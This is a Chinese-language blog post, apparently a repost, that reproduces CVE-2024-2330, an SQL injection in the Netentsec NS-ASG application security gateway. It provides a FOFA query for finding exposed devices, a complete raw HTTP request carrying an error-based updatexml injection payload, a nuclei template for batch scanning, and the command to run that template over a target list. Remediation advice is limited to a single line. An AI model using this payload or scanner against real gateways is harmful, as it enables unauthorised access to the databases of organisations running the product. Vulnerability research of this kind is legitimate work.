CVE-2024-2330漏洞复现(POC)

admin 2024年3月11日07:38:48评论42 views字数 2358阅读7分51秒阅读模式

使

01

漏洞名称

网康NS-ASG应用安全网关index.php sql注入漏洞

CVE-2024-2330漏洞复现(POC)

02

漏洞影响

Netentsec NS-ASG Application Security Gateway 6.3版本

03

漏洞描述

网康科技的NS-ASG应用安全网关是一款软硬件一体化的产品,集成了SSL和 IPSecQ,旨在保障业务访问的安全性,适配所有移动终端,提供多种链路均衡和选择技术,支持多种认证方式灵活组合,以及内置短信认证、LDAP令牌、USB KEY等多达13种认证方式。击者可以远程发起攻击。

04

FOFA搜索语句

app="网康科技-NS-ASG安全网关"

CVE-2024-2330漏洞复现(POC)

05

漏洞复现

向靶场发送如下数据包

POST /protocol/index.php HTTP/1.1Host: x.x.x.xCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82deUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{"BandIPMacId":"1","IPAddr":"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='","MacAddr":"","DestIP":"","DestMask":"255.255.255.0","Description":"Sample+Description"}"]}

CVE-2024-2330漏洞复现(POC)

漏洞复现成功

06

批量漏洞扫描poc

nuclei poc文件内容如下,计算md5(102103122)的值

id: CVE-2024-2330

info:  name: 网康NS-ASG应用安全网关index.php sql注入漏洞  author: fgz  severity: critical  description: Netentsec NS-ASG Application Security Gateway 6.3中发现了一个漏洞,被分类为危急级别。这影响了文件/protocol/index.php的一个未知部分。对参数IPAddr的操作导致了SQL注入。攻击者可以远程发起攻击。  metadata:    max-request: 1    fofa-query: app="网康科技-NS-ASG安全网关"    verified: truerequests:  - raw:      - |+        POST /protocol/index.php HTTP/1.1        Host: {{Hostname}}        Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0        Accept: */*        Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2        Accept-Encoding: gzip, deflate        Sec-Fetch-Dest: empty        Sec-Fetch-Mode: cors        Sec-Fetch-Site: same-origin        Te: trailers        Connection: close        Content-Type: application/x-www-form-urlencoded        Content-Length: 263                jsoncontent={"protocolType":"addmacbind","messagecontent":["{"BandIPMacId":"1","IPAddr":"eth0'and(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))='","MacAddr":"","DestIP":"","DestMask":"255.255.255.0","Description":"Sample+Description"}"]}

    matchers:      - type: dsl        dsl:          - "status_code == 200 && contains((body), 'error') && contains(body,'6cfe798ba8e5b85feb50164c59f4bec')"

运行POC

nuclei.exe -t mypoc/cve/CVE-2024-2330.yaml -l data/wangkang.txt

CVE-2024-2330漏洞复现(POC)

07

修复建议

建议您更新当前系统或软件至最新版,完成漏洞的修复。

原文始发于微信公众号(AI与网安):CVE-2024-2330漏洞复现(POC)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年3月11日07:38:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-2330漏洞复现(POC)http://cn-sec.com/archives/2565290.html

发表评论

匿名网友 填写信息